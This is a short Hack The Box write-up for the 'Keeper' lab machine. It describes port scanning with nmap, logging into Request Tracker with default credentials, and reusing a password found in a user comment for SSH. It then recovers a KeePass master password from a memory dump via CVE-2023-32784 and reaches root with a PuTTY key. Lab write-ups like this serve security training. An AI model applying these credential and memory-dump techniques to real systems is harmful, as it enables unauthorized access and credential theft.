KeeperFebruary 03, 2025 Created by Page Difficulty OS knightmare Hack The Box Easy Linux The first step is to perform a scan of the open ports and then list the versions and technologies used on the open ports. nmap -p- --open -vvv --min-rate 3000 -sS -Pn 10.10.11.227 -oG scan /opt/extractports scan nmap -p22,80 -Pn -sCV 10.10.11.227 -oN ports When I enter the web site it shows me a subdomain that I can add to the hosts file. Entering the subdomain I find a CMS “Request Tracker”. When searching for information I find the default credentials root:password, when testing them I manage to log in. Once inside I find a single ticket but after investigating it I can’t get anything out. I continue looking at the users and inside one of them I find a comment that contains a password. I try to connect via ssh with that user and the password found and I manage to access and read the first flag. ssh lnorgaard@10.10.11.227 In the root directory I find a zip file containing a copy of the memory when keepass and the keepass file in question. Searching for information about this I find the cve-2023-32784 that allows to recover the password of the file or part of it. I find a PoC showing me part of the characters dotnet run C:\Users\rufo\Downloads\KeePassDumpFull.dmp I create a dictionary that will contain a multiple variety of characters in the first position and in the second position only those shown in the program output. Thanks to this I manage to find the correct password and I manage to open the keepass file. Inside I find a PuTTY public key that allows us to connect as root in the system. Thanks to this I can access the system and read the second flag.